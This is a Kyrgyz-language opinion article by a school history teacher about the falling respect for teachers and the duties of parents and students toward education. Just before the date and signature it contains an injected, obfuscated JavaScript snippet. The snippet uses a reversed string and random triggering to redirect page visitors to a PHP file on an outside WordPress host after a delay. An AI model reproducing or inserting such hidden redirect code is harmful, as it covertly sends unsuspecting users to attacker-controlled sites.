ТАЛАНДЫДА КАЛГАН МУГАЛИМДИН ТАЛАМЫН КИМ ТАЛАШАТ?
Коомду билим берүүсүз элестетүү мүмкүн эмес. Улам алга жылуу, өнүгүү, адамзат жашоосунун өсүү деңгээли болуп көрбөгөндөй ылдамдыкта бара жатат. Адам баласынын аң-сезимдүүлүк аспектисинен алып караганда, бул мыйзам ченемдүү көрүнүш. Глобалдашкан коомдо билимдин аба менен суудай эң зарыл экендиги далилденүүдө. Ааламдагы адам акылына, өмүр ченемине сыйгыс не бир кереметтерди көрүп, албетте, кубанбай койбойсуң. Ириде, мунун баары күчтүү билимди, нагыз тажрыйбаны талап кылат. Бирок, өнүккөн коомдун шарында келе жаткан баарыбыздын эле билим жаатында телегейибиз тегиз эмес. Түйшөлтчү көйгөйлөр бар. Мен бүгүн мугалим, ата-эне жана окуучу темасында ой калчагым келди.
Мугалим — асыл кесиптин ээси. Мугалим — ой казынасы, билим кенчи. Мугалим — өмүр өрнөгү. Анын баа жеткис түмөн түйшүгүнөн адам алга кадам таштап, турмуштук сабак алат. Билимге сугарылып, адамдык сапаттарга ээ болот. Мээнети, акыл эмгегинин ордун балдардын ишенимдүү көз карашына алмаштырган кеменгер асыл устаттарга алкоо гана жарашат. А бирок, салабаттуу акылгөйлүк ордуна куу чирендик, салмактуу чечендик өнөрдүн ордуна тилинен чаң чыккан тапандык, тараза ташындай калыстык ордуна желге ыргалган желпилдек жел өпкөлүк көбөйүп, жакшы[1]жаманды, ак-караны иргөө баарынын эле акыл-туюмуна ылайык боло бербеген мезгилге тушуктук. Жараткан жалгаган бул жарык жашоодо билим албастан эле жакшы жашоо курса болот деген азгырык торун жайды. Ырас, андай чен-өлчөм таптакыр эле билим албай койсо болот деген сөз эмес. Жалпы болбосо да мындай көйгөй көп жерде орун алганы анык. Мугалим барын[1]таасы менен билим берүүгө ынтызарланып, окуучунун дүйнөсүнө сүңгүп кирип, билип калсын, үйрөнүп алсын деген аракетине окуучу жалкоолугу, кайдыгерлиги менен жооп кылганы жан кейитпей койбойт. Ата-эне тарабынан жакшы шарт түзүлүп, толук камсыздалбаганы албетте, эң жакшы делген сабакка кедергисин тийгизери бышык. Баланын жакшы окуп мыкты баа алышына көз караш башка да, “бул менен теңдүүлөрдөн кемсинип калбасын” деп баасы асман чапчыган смартфон алып берүүдөгү көз караш башка. Ата-энелердеги максат ар түрдүү, көз караш ар түрдүү экендигинен коомдогу ар кандай ажырым пикирлер пайда болууда. Мугалимдин коомдогу кадыр-баркынын көз көрүнөө тепселиши мени жаш адис катары өтө катуу кейитет. Баласы менен тең балдардын мыскылына калып, кол көтөрмөк мындай турсун, катуу сөз айтса коомдун таландысына калган мугалимдин таламын ким талашат? Мугалимге ушундай мамиледен улам келечек ээлери педагогикалык багытты тандабай жатышкан чыгаар? Андан көрө мугалимди алпештеп, калыстыгын даңазалап, балдарды кечиримдүү, көтөрүмдүү болууга үндөп, ата-бабадан келаткан “улууну урматтап, кичүүнү ызааттоо” деген улуу тарбиялык нускамаларды эске салууга болбойбу?
Эгемен өлкөбүз демократиялык аралча экендиги талашсыз сыймык. Бирок, демократияны аша чаап пайдаланып, адамдыктан аласалдырган аракеттерди көргөнүңдө бала эмес, баланы баккан урматтуу ата-энелерге да кайрылгым келет. “Баланын эң алгачкы жана сүйүктүү мугалими — анын энеси” деген жакшы учкул кепти ар дайым жадымдан чыгарбай келем. Баланын баштапкы коому – бул үй-бүлө. Алгач бала үлгүнү, тарбияны ата[1]энеден алса, анда биз билимге туура багыт берүүбүз абзел. Мугалим өз билим дараметин окуучуларына арнаса, ата-эне асыл өмүрүн балдарына арнаса, демек балдарыбыз келечекте улуу күч болот. Тунук тарбия менен даанышмандык сапаттар ширелишкен коомдун өкүлдөрүн көрүү — жалпыбыздын максатыбыз болушу керек.
$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/22_02.pdf»>2022-жылдын 22-февралы
Курманжан СУЛТАНОВА,
Сузак районундагы №51 С.Жээнбеков атындагы
орто мектептин тарых мугалими